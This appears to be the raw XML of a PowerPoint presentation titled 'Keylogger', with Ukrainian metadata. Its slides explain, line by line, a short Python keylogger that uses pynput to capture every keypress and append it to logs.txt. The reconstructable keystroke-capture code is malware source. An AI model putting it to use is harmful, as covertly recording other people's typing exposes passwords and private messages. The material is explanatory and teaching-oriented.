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2F7965-DE1E-465C-9700-664E77C8AC82}" v="93" dt="2024-07-21T00:06:29.9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Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}"/>
    <pc:docChg chg="addSld modSld">
      <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-21T00:06:29.949" v="66" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="delSp modSp">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-20T14:31:04.751" v="4"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3930024240" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-20T14:30:57.798" v="1" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3930024240" sldId="256"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-20T14:31:04.751" v="4"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3930024240" sldId="256"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-21T00:05:59.791" v="55" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="153279659" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-21T00:01:35.539" v="6"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="153279659" sldId="257"/>
            <ac:spMk id="2" creationId="{FB05D526-13DF-4CEF-0D7B-CB3261D76779}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-21T00:01:58.821" v="7"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="153279659" sldId="257"/>
            <ac:spMk id="3" creationId="{6861E771-BC2E-B9FA-227D-6BE2AC91B6F1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-21T00:02:26.354" v="16" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="153279659" sldId="257"/>
            <ac:spMk id="6" creationId="{3E327356-D5E2-A54B-EF1A-6D92313AC156}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-21T00:02:40.042" v="25" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="153279659" sldId="257"/>
            <ac:spMk id="7" creationId="{4FEA5DDD-ADCF-0031-E1BB-7804B6A3248F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-21T00:05:59.791" v="55" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="153279659" sldId="257"/>
            <ac:spMk id="9" creationId="{452A32DC-D0A7-315B-CF96-507412669D94}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-21T00:02:00.822" v="8" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="153279659" sldId="257"/>
            <ac:picMk id="4" creationId="{2D027CB6-B8D4-5E2E-672D-708DA16EEE19}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-21T00:02:12.650" v="10" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="153279659" sldId="257"/>
            <ac:picMk id="5" creationId="{18BBB533-F090-CF06-96DE-BCF27FE3E26C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-21T00:02:57.714" v="30" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="153279659" sldId="257"/>
            <ac:picMk id="8" creationId="{7C112857-5393-9CE2-09A6-6F3821998B28}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-21T00:06:29.949" v="66" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3360084300" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-21T00:06:11.198" v="58"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3360084300" sldId="258"/>
            <ac:spMk id="2" creationId="{9DD8F42B-C731-6FA1-6436-7C231AF2EEF0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-21T00:06:09.792" v="57"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3360084300" sldId="258"/>
            <ac:spMk id="3" creationId="{92564DA5-E154-43B0-A1A0-7A03E358FE3A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-21T00:06:29.949" v="66" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3360084300" sldId="258"/>
            <ac:spMk id="5" creationId="{57F432E6-532F-1BCC-FD14-6628F00745FF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Назар Дячок" userId="a49f8edf2231cb71" providerId="Windows Live" clId="Web-{942F7965-DE1E-465C-9700-664E77C8AC82}" dt="2024-07-21T00:06:13.058" v="59" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3360084300" sldId="258"/>
            <ac:picMk id="4" creationId="{F80A1876-B97E-D04A-DBA4-720A103CD94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Зразок підзаголовка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20.07.2024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5309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20.07.2024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08874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20.07.2024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1625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20.07.2024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9703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20.07.2024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01798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20.07.2024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83087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20.07.2024</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA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5588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20.07.2024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91776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20.07.2024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83607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20.07.2024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50522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20.07.2024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77304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2F0B57-8E6A-4005-9EDD-D258F6CC94AB}" type="datetimeFigureOut">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>20.07.2024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88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err="1"/>
              <a:t>Keylogger</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3930024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Місце для вмісту 3" descr="Зображення, що містить Шрифт, знімок екрана, Графіка, текст&#10;&#10;Опис створено автоматично">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D027CB6-B8D4-5E2E-672D-708DA16EEE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983" y="312152"/>
            <a:ext cx="4200525" cy="495300"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Рисунок 4" descr="Зображення, що містить Шрифт, текст, Графіка, знімок екрана&#10;&#10;Опис створено автоматично">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18BBB533-F090-CF06-96DE-BCF27FE3E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21" y="1890615"/>
            <a:ext cx="3314700" cy="495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327356-D5E2-A54B-EF1A-6D92313AC156}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4855029" y="217714"/>
            <a:ext cx="664754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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>pynput.keyboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> import Listener:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Imports the Listener class from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>pynput.keyboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> module. This class allows monitoring and controlling of keyboard input.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EA5DDD-ADCF-0031-E1BB-7804B6A3248F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4027714" y="1894114"/>
            <a:ext cx="666931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Aptos"/>
              </a:rPr>
              <a:t>key_information = 'logs.txt'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Defines the name of the file where keystroke logs will be saved.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Рисунок 7" descr="Зображення, що містить текст, знімок екрана, Шрифт&#10;&#10;Опис створено автоматично">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C112857-5393-9CE2-09A6-6F3821998B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04" y="2859768"/>
            <a:ext cx="3165022" cy="36929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52A32DC-D0A7-315B-CF96-507412669D94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4027714" y="2735943"/>
            <a:ext cx="7590971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"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1"/>
              <a:t>write_to_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>(key):: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Defines a function that writes the captured keystrokes to a file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>log = str(key):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Converts the captured key into a string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>log = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>log.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>("'", ''):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Removes single quotes from the string representation of the key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>if log == '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Key.space</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>'::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Checks if the captured key is the spacebar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>log = ' ': </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Replaces the string representation of the spacebar with a space.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>if log == '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Key.enter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>'::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Checks if the captured key is the Enter key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>log = '\n':</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Replaces the string representation of the Enter key with a newline.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>if log == '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Key.tab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>'::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Checks if the captured key is the Tab key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>log = '':</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Replaces the string representation of the Tab key with an empty string (no logging for Tab).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>if log == '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Key.shift</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>'::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Checks if the captured key is the Shift key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>log = '':</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Replaces the string representation of the Shift key with an empty string (no logging for Shift).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>if log == '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Key.backspace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>'::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Checks if the captured key is the Backspace key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>log = ' [BACKSPACE] ':</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Replaces the string representation of the Backspace key with a descriptive string indicating a backspace was pressed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>with open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1"/>
              <a:t>key_information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>, 'a') as f::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Opens the log file in append mode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>(log):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Writes the processed keystroke to the log file.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="153279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Місце для вмісту 3" descr="Зображення, що містить текст, Шрифт, знімок екрана&#10;&#10;Опис створено автоматично">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F80A1876-B97E-D04A-DBA4-720A103CD9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8494" y="402885"/>
            <a:ext cx="5800725" cy="75247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F432E6-532F-1BCC-FD14-6628F00745FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="979714" y="1589314"/>
            <a:ext cx="6284685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"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>with Listener(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>write_to_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>) as listener::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Creates a Listener object that calls the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>write_to_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function whenever a key is pressed. The listener runs in a context manager, ensuring proper cleanup when done.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>listener.join</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Blocks the main thread, waiting for the listener to complete. This keeps the listener running indefinitely, capturing keystrokes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336008430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Широкий екран</PresentationFormat>
  <Paragraphs>0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</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="4" baseType="lpstr">
      <vt:lpstr>Тема Office</vt:lpstr>
      <vt:lpstr>Keylogger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/>
  <cp:lastModifiedBy/>
  <cp:revision>39</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-20T14:30:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-21T00:06:30Z</dcterms:modified>
</cp:coreProperties>
</file>